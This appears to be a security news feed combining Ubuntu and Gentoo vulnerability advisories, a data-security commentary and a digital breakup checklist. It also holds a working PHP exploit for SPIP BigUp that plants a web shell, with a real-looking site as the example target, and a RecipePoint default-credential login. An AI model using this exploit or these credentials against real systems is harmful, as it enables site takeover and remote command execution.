Ubuntu Security Notice 6992-2 - USN-6992-1 fixed vulnerabilities in Firefox. The update introduced several minor regressions. This update fixes the problem. Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Nils Bars discovered that Firefox contained a type confusion vulnerability when performing certain property name lookups. An attacker could potentially exploit this issue to cause a denial of service, or execute arbitrary code. It was discovered that Firefox did not properly manage memory during garbage collection. An attacker could potentially exploit this issue to cause a denial of service, or execute arbitrary code. Seunghyun Lee discovered that Firefox contained a type confusion vulnerability when handling certain ArrayTypes. An attacker could potentially exploit this issue to cause a denial of service, or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6992-2September 23, 2024firefox regressions==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:USN-6992-1 caused some minor regressions in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:USN-6992-1 fixed vulnerabilities in Firefox. The update introducedseveral minor regressions. This update fixes the problem.We apologize for the inconvenience.Original advisory details:  Multiple security issues were discovered in Firefox. If a user were  tricked into opening a specially crafted website, an attacker could  potentially exploit these to cause a denial of service, obtain sensitive  information across domains, or execute arbitrary code. (CVE-2024-8382,  CVE-2024-8383, CVE-2024-8386, CVE-2024-8387, CVE-2024-8389)    Nils Bars discovered that Firefox contained a type confusion vulnerability  when performing certain property name lookups. An attacker could  potentially exploit this issue to cause a denial of service, or execute  arbitrary code. (CVE-2024-8381)    It was discovered that Firefox did not properly manage memory during  garbage collection. An attacker could potentially exploit this issue to  cause a denial of service, or execute arbitrary code. (CVE-2024-8384)    Seunghyun Lee discovered that Firefox contained a type confusion  vulnerability when handling certain ArrayTypes. An attacker could  potentially exploit this issue to cause a denial of service, or execute  arbitrary code. (CVE-2024-8385)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   firefox                         130.0.1+build1-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changesReferences:   https://ubuntu.com/security/notices/USN-6992-2   https://ubuntu.com/security/notices/USN-6992-1   https://launchpad.net/bugs/2081668Package Information:   https://launchpad.net/ubuntu/+source/firefox/130.0.1+build1-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6992-2

Gentoo Linux Security Advisory 202409-12 - Multiple vulnerabilities have been discovered in pypy and pypy3, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 7.3.3_p37_p1-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: pypy, pypy3: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #741496, #741560, #774114, #782520  
       ID: 202409-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in pypy and pypy3, the  
worst of which could lead to arbitrary code execution.

Background  
==========

A fast, compliant alternative implementation of the Python language.

Affected packages  
=================

Package                  Vulnerable         Unaffected  
-----------------------  -----------------  ------------------  
dev-python/pypy          < 7.3.3_p37_p1-r1  >= 7.3.3_p37_p1-r1  
dev-python/pypy-exe      < 7.3.2            >= 7.3.2  
dev-python/pypy-exe-bin  < 7.3.2            Vulnerable!  
dev-python/pypy3         < 7.3.3_p37_p1-r1  >= 7.3.3_p37_p1-r1

Description  
===========

Multiple vulnerabilities have been discovered in pypy. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All pypy users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/pypy-7.3.3_p37_p1-r1"  
  # emerge --ask --oneshot --verbose ">=dev-python/pypy-exe-7.3.2"  
  # emerge --ask --oneshot --verbose ">=dev-python/pypy-exe-bin-7.3.2"

All pypy3 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/pypy3-7.3.3_p37_p1-r1"

References  
==========

[ 1 ] CVE-2020-27619  
      https://nvd.nist.gov/vuln/detail/CVE-2020-27619

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-12

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-12

Gentoo Linux Security Advisory 202409-11 - Multiple vulnerabilities have been discovered in Oracle VirtualBox, the worst of which could lead to privilege escalation. Versions greater than or equal to 7.0.12 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Oracle VirtualBox: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #918524  
       ID: 202409-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Oracle VirtualBox, the  
worst of which could lead to privilege escalation.

Background  
==========

VirtualBox is a powerful virtualization product from Oracle.

Affected packages  
=================

Package                   Vulnerable    Unaffected  
------------------------  ------------  ------------  
app-emulation/virtualbox  < 7.0.12      >= 7.0.12

Description  
===========

Multiple vulnerabilities have been discovered in Oracle VirtualBox.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Oracle VirtualBox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/virtualbox-7.0.12"

References  
==========

[ 1 ] CVE-2023-22098  
      https://nvd.nist.gov/vuln/detail/CVE-2023-22098  
[ 2 ] CVE-2023-22099  
      https://nvd.nist.gov/vuln/detail/CVE-2023-22099  
[ 3 ] CVE-2023-22100  
      https://nvd.nist.gov/vuln/detail/CVE-2023-22100

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-11

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-11

SPIP BigUp version 4.3.1 suffers from a remote PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : SPIP BigUp 4.3.1 php code injection Vulnerability                                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.    The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value.   By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server.   It allows unauthenticated users to execute arbitrary code remotely via the public interface. [+] Line 143 : Set your target & payload .[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass indoushka {    private $targetUri;    private $formPage;    private $payload;    public function __construct($targetUri, $formPage = 'auto', $payload) {        $this->targetUri = $targetUri;        $this->formPage = $formPage;        $this->payload = $payload;    }    public function check() {        $spipVersion = $this->getSpipVersion();        if (!$spipVersion) {            return "Unable to determine the version of SPIP.";        }        echo "SPIP Version detected: " . $spipVersion . "\n";        $vulnerableRanges = [            ['start' => '4.0.0', 'end' => '4.1.17'],            ['start' => '4.2.0', 'end' => '4.2.15'],            ['start' => '4.3.0', 'end' => '4.3.1']        ];        $isVulnerable = false;        foreach ($vulnerableRanges as $range) {            if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {                $isVulnerable = true;                break;            }        }        if (!$isVulnerable) {            return "The detected SPIP version ($spipVersion) is not vulnerable.";        }        echo "SPIP version $spipVersion is vulnerable.\n";        return "SPIP version $spipVersion is vulnerable.";    }    private function getSpipVersion() {        // This function should make an HTTP request to detect the SPIP version        // Return the version or false if undetectable        return '4.3.1'; // Example version, replace with actual logic    }    private function getFormData() {        $pages = ['login', 'spip_pass', 'contact'];        if ($this->formPage !== 'auto') {            $pages = [$this->formPage];        }        foreach ($pages as $page) {            $url = $this->normalizeUri($page);            $response = $this->sendRequest('GET', $url);            if ($response['status'] === 200) {                libxml_use_internal_errors(true); // Prevent warnings from invalid HTML                $doc = new DOMDocument();                @$doc->loadHTML($response['body']);                libxml_clear_errors();                $inputs = $doc->getElementsByTagName('input');                if ($inputs->length > 1) {                    $action = $inputs->item(0)->getAttribute('value');                    $args = $inputs->item(1)->getAttribute('value');                                        if ($action && $args) {                        echo "Found formulaire_action: $action\n";                        echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n";                        return ['action' => $action, 'args' => $args];                    }                }            }        }        return null;    }    private function normalizeUri($page) {        return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');    }    private function sendRequest($method, $url, $data = null) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        if ($method === 'POST' && $data) {            curl_setopt($ch, CURLOPT_POST, true);            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);            curl_setopt($ch, CURLOPT_HTTPHEADER, [                'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)            ]);        }        $response = curl_exec($ch);        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);        curl_close($ch);        return ['status' => $httpCode, 'body' => $response];    }    private function encodePayload() {        return base64_encode($this->payload);    }    public function exploit() {        $formData = $this->getFormData();        if (!$formData) {            echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";            return;        }        echo "Preparing to send exploit payload to the target...\n";        $encodedPayload = $this->encodePayload();        $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));        $postData = "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n";        $postData .= "--$boundary\r\n";        $postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";        $postData .= "--$boundary--\r\n";        $this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);    }    private function randomString($length = 8) {        return bin2hex(random_bytes($length / 2));    }}// Usage example:$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');$exploit->check();$exploit->exploit();?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP BigUp 4.3.1 Code Injection

Gentoo Linux Security Advisory 202409-10 - Multiple vulnerabilities have been discovered in Xen, the worst of which could lead to privilege escalation. Versions greater than or equal to 4.17.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Xen: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #918669, #921355, #923741, #928620, #929038  
       ID: 202409-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Xen, the worst of which  
could lead to privilege escalation.

Background  
==========

Xen is a bare-metal hypervisor.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
app-emulation/xen  < 4.17.4      >= 4.17.4

Description  
===========

Multiple vulnerabilities have been discovered in Xen. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Xen users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emulation/xen-4.17.4"

References  
==========

[ 1 ] CVE-2022-4949  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4949  
[ 2 ] CVE-2022-42336  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42336  
[ 3 ] CVE-2023-28746  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28746  
[ 4 ] CVE-2023-34319  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34319  
[ 5 ] CVE-2023-34320  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34320  
[ 6 ] CVE-2023-34321  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34321  
[ 7 ] CVE-2023-34322  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34322  
[ 8 ] CVE-2023-34323  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34323  
[ 9 ] CVE-2023-34324  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34324  
[ 10 ] CVE-2023-34325  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34325  
[ 11 ] CVE-2023-34327  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34327  
[ 12 ] CVE-2023-34328  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34328  
[ 13 ] CVE-2023-46835  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46835  
[ 14 ] CVE-2023-46836  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46836  
[ 15 ] CVE-2023-46837  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46837  
[ 16 ] CVE-2023-46839  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46839  
[ 17 ] CVE-2023-46840  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46840  
[ 18 ] CVE-2023-46841  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46841  
[ 19 ] CVE-2023-46842  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46842  
[ 20 ] CVE-2024-2193  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2193  
[ 21 ] CVE-2024-31142  
      https://nvd.nist.gov/vuln/detail/CVE-2024-31142  
[ 22 ] XSA-431  
      https://xenbits.xen.org/xsa/advisory-431.html  
[ 23 ] XSA-432  
      https://xenbits.xen.org/xsa/advisory-432.html  
[ 24 ] XSA-436  
      https://xenbits.xen.org/xsa/advisory-436.html  
[ 25 ] XSA-437  
      https://xenbits.xen.org/xsa/advisory-437.html  
[ 26 ] XSA-438  
      https://xenbits.xen.org/xsa/advisory-438.html  
[ 27 ] XSA-439  
      https://xenbits.xen.org/xsa/advisory-439.html  
[ 28 ] XSA-440  
      https://xenbits.xen.org/xsa/advisory-440.html  
[ 29 ] XSA-441  
      https://xenbits.xen.org/xsa/advisory-441.html  
[ 30 ] XSA-442  
      https://xenbits.xen.org/xsa/advisory-442.html  
[ 31 ] XSA-447  
      https://xenbits.xen.org/xsa/advisory-447.html  
[ 32 ] XSA-449  
      https://xenbits.xen.org/xsa/advisory-449.html  
[ 33 ] XSA-450  
      https://xenbits.xen.org/xsa/advisory-450.html  
[ 34 ] XSA-451  
      https://xenbits.xen.org/xsa/advisory-451.html  
[ 35 ] XSA-452  
      https://xenbits.xen.org/xsa/advisory-452.html  
[ 36 ] XSA-453  
      https://xenbits.xen.org/xsa/advisory-453.html  
[ 37 ] XSA-454  
      https://xenbits.xen.org/xsa/advisory-454.html  
[ 38 ] XSA-455  
      https://xenbits.xen.org/xsa/advisory-455.html

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-10

Gentoo Linux Security Advisory 202409-9 - A vulnerability has been discovered in Exo, which can lead to arbitrary code execution. Versions greater than or equal to 4.17.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Exo: Arbitrary Code Execution  
     Date: September 22, 2024  
     Bugs: #851201  
       ID: 202409-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Exo, which can lead to arbitrary  
code execution.

Background  
==========

Exo is an Xfce library targeted at application development, originally  
developed by os-cillation. It contains various custom widgets and APIs  
extending the functionality of GLib and GTK. It also has some helper  
applications that are used throughout the entire Xfce desktop to manage  
preferred applications and edit .desktop files.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
xfce-base/exo  < 4.17.2      >= 4.17.2

Description  
===========

A vulnerability has been discovered in Exo. Please review the CVE  
identifiers referenced below for details.

Impact  
======

Exo executes remote desktop files which may lead to unexpected arbitrary  
code execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Exo users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=xfce-base/exo-4.17.2"

References  
==========

[ 1 ] CVE-2022-32278  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32278

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-09

Gentoo Linux Security Advisory 202409-8 - Multiple vulnerabilities have been discovered in OpenVPN, the worst of which could lead to information disclosure. Versions greater than or equal to 2.6.7 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: OpenVPN: Multiple Vulnerabilities  
     Date: September 22, 2024  
     Bugs: #835514, #917272  
       ID: 202409-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in OpenVPN, the worst of  
which could lead to information disclosure.

Background  
==========

OpenVPN is a multi-platform, full-featured SSL VPN solution.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-vpn/openvpn  < 2.6.7       >= 2.6.7

Description  
===========

Multiple vulnerabilities have been discovered in OpenVPN. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All OpenVPN users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-vpn/openvpn-2.6.7"

References  
==========

[ 1 ] CVE-2022-0547  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0547  
[ 2 ] CVE-2023-46849  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46849  
[ 3 ] CVE-2023-46850  
      https://nvd.nist.gov/vuln/detail/CVE-2023-46850

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-08

RecipePoint version 1.9 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : RecipePoint 1.9 Insecure Settings Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   || # Vendor    : https://demo.phpscriptpoint.com/recipepoint/                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 1234[+] https://www/127.0.0.1/demo/phpscriptpointcom/recipepoint/adminGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

RecipePoint 1.9 Insecure Settings

Data discovery and classification are foundational for data security, data governance, and data protection.

Todd Thiemann, Senior Analyst, Enterprise Strategy Group

September 23, 2024

3 Min Read

Source: Cagkan Sayin via Alamy Stock Photo

COMMENTARY

When it comes to your sensitive data, not knowing where your crown jewels are located and ensuring they are adequately secured can have catastrophic consequences. Data resilience is the subset of cyber resilience focused on an organization's data assets. Security teams need a strategic approach to data resilience — understanding where their sensitive data stores are located and what's inside — to effectively secure their data. 

Data discovery and classification are foundational for data security, data governance, and data protection (backup and recovery). You can't secure what you don't know exists (discovery), and you need to know what is inside a data store (classification) to take appropriate action to mitigate your risk. 

My latest Enterprise Strategy Group research, conducted with my colleague Jon Brown, explores how enterprises are ensuring data resilience, which is the intersection of data security posture management (DSPM), data security (hardening data with encryption, masking, etc.), data protection (backup and recovery), and data governance. We surveyed 370 IT and cybersecurity professionals from midmarket and enterprise companies about data resilience and DSPM. In the fast-evolving DSPM space, the research found that the first phase of a DSPM deployment to locate, categorize, and establish policies around sensitive data took less than six months for 76% of the respondents, with the largest cluster being four to six months for more than 40% of those responding. 

DSPM vendors differentiate themselves on the time to value (TTV) for their offerings, and the different technologies probably have a significant impact on TTV. Implementing DSPM is like any other project in combining people, process, and technology. Much of the time required to operationalize a technology deployment comes from the people and process side of the equation. While the TTV varies, in talking to various chief information security officers (CISOs) and vendors, we found that the typical steps in a project are:

*   Align stakeholders and plan.
    
*   Identify exposed data stores and mitigate.
    
*   Identify data stores with critical data.
    
*   Classify data (cardholder data for PCI DSS, protected health information, personally identifiable information, information covered by GDPR) to your organization's categories (public, internal, sensitive, restricted.
    
*   Identify/delegate data owners.
    
*   Identify users with access to sensitive/restricted data and validate access is needed (the stale access problem).
    
*   Restrict access to need to know, least privilege.
    
*   Identify misconfigurations and mitigate.
    

*   Determine necessary security controls to protect data based on classification.
    

In speaking to both security leaders and DSPM vendors, the initial step of achieving stakeholder alignment and planning for the rollout is probably the most important to project success. Here are all the steps:

*   Engage key stakeholders: Start by aligning key stakeholders, such as GRC (governance, risk, and compliance), data teams, IT data protection, cloud architects, and security teams. Ensure that everyone understands the objectives, benefits, and their respective roles in the DSPM deployment process. Focus on the win-win. 
    
*   Define goals, definitions, and metrics: Collaboratively establish the goals of the DSPM initiative, such as reducing data exposure, achieving compliance, improving overall data security posture, or facilitating generative AI deployment. Arrive at what data is sensitive to the business and data classification definitions. Agree on key performance indicators (KPIs) to measure progress and success. Planning upfront avoids or minimizes friction as the project progresses. 
    
*   Secure executive buy-in: Present a clear case to constituents, highlighting the importance of DSPM in mitigating data risks, achieving regulatory compliance, and supporting business goals. Ensure top-down support for resource allocation and prioritization. DSPM has many constituents, and getting executive buy-in ensures adequate resourcing and team responsiveness. 
    
*   Assign roles and responsibilities: Clearly define the responsibilities of each team. For example, GRC will focus on compliance and policy alignment, data teams will manage data classification and ownership, and security teams will oversee the implementation of security controls and monitoring. 
    

Getting off on the right foot and achieving alignment at project inception will increase your chances of overall DSPM project success. 

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa, and forced to spend the night in jail — just for doing their pen-testing jobs. Listen now!

**About the Author**

Senior Analyst, Enterprise Strategy Group

Todd Thiemann is a senior analyst at the Enterprise Strategy Group, researching data security and identity and access management (IAM). He is an information security veteran with more than a decade of information security experience across a range of subjects including encryption, key management, IAM/authentication, identity security, and security operations at leading cybersecurity companies including Arctic Wolf Networks, Trend Micro, Vormetric/Thales, and Nok Nok Labs. He graduated from Georgetown University with a bachelor of science degree, and earned an MBA from the Anderson School at UCLA. He enjoys cybersecurity because it is ever-changing and continually challenges us to simply explain things while not losing essential nuance.

Data Security Posture Management: Accelerating Time to Value

The internet has made breaking up a lot harder. The Modern Love Digital Breakup Checklist can help you separate locations, accounts, and more.

Breaking up is hard to do. The internet has made it harder.

With couples today regularly sharing access to one another’s email accounts, streaming services, social media platforms, online photo albums, and more, the risk of a bad breakup isn’t just heartache. Equipped with unfettered access into sensitive, shared online accounts, a vindictive ex could track someone who is actively using services like DoorDash, Uber, or Airbnb, spy on someone through a Ring doorbell, raise the temperature on a Nest thermostat, or shout obscenities through a baby monitor.

As every relationship is different, there’s no one-size-fits-all solution to safely disentangling your digital life from your ex, but there are a few rules that can make the process easier.

And, because this can be a lot of work, here are a few things that can help you along the way:

*   A password manager that will help you create and store unique passwords for each online account.
*   The use of multifactor/two-factor authentication on every sensitive account that allows it.
*   A friend who can go through these exercises side-by-side with you.

Further down is a more comprehensive checklist of many considerations you can take in separating your digital life from your ex, but, here’s a quick, handy guide:

It’s important to remember that this work won’t be completed in a day. That’s entirely okay. Instead of trying to accomplish everything in one weekend, prioritize the most sensitive work—cutting off access to email accounts, online banking, shared photo albums, social media, and any services or apps that can reveal your location.

As Malwarebytes recently discovered in research conducted this year, 56% of people in committed relationships in the United States agreed that they “would like to see more guidance on how to handle shared logins, accounts, and apps in a relationship or during a breakup,” and 45% agreed that they “would have a hard time knowing where to begin if I no longer wanted to share location-based apps or services with my partner or in the event of a breakup.”

We hope this digital breakup checklist, which is not comprehensive, can provide some of that guidance.

Here is the Modern Love Digital Breakup Checklist.

*   Log out of personal accounts on shared devices, including laptops, tablets, e-readers, smartphones, smart TVs, and Internet of Things devices. This includes:
    
    *   Email, social media, and online banking accounts on shared tablets, computers, and smartphones.
    
    *   Email, social media, and online banking accounts on the shared devices of children/the entire family.
    *   Entertainment accounts (Hulu, Netflix, Disney+, Spotify, etc.) on smart TVs and streaming devices such as Roku, Google Chromecast, Apple TV, etc.
*   Remove your ex’s accounts from any device you share that you will maintain ownership of after the breakup. Here’s are guides on how to remove someone from:
    
    *   Windows device
    
    *   Mac device
    *   Android devices

*   For shared accounts where you and your ex had one set of login credentials, log out of those shared accounts on your own device.
*   If you want to continue using those services, create a new personal account with a unique password.

**3\. **Review personal accounts****

*   Before resetting passwords, check the recovery settings on your personal account to ensure that any attempts to reset your password will be sent to your personal email account and not to an email account owned by your ex.
*   Before resetting passwords, consider using a password manager to help create, store, and remember unique passwords for each account.
*   Reset and create unique passwords for sensitive accounts, including:
    
    *   Email accounts
    
    *   Online banking and financial accounts (Chase, Wells Fargo, Venmo, PayPal, Zelle, Cash App, etc.)
    *   Online shopping accounts (Amazon, Etsy, Shein, Temu, etc.)
    *   Social media accounts (TikTok, Instagram, Facebook, etc.)
    *   Shared cloud accounts for photos (Google Photos, iCloud)
    *   Shared cloud accounts for file storage (Dropbox, Box, etc.)
    *   Streaming entertainment accounts (Netflix, Disney+, Hulu, Spotify, Apple Music, etc.)
    *   Parental monitoring apps (Life360, Bark, Qustodio)
    *   Online forums and chat services (Reddit, Discord, etc.)
*   Reset and create unique passwords for accounts that can expose your location to users who are logged into the same account, including:
    
    *   Food and grocery delivery apps (Uber Eats, DoorDash, Postmates, etc.)
    
    *   Ride-sharing apps (Uber, Lyft, etc.)Vacation rental apps (Airbnb, Vrbo, etc.)
    *   Health and fitness tracking apps (FitBit, Strava, etc.)
    *   Connected apps for modern cars with anti-theft location tracking
*   Enable multifactor authentication on sensitive accounts and accounts that can expose your location, when provided as an option.

**4\. **Review/remove your signed-in devices****

*   Check your security settings in your online accounts to review what devices are currently logged into the same account. If you see a device that does not belong to you, force that device to be logged out.
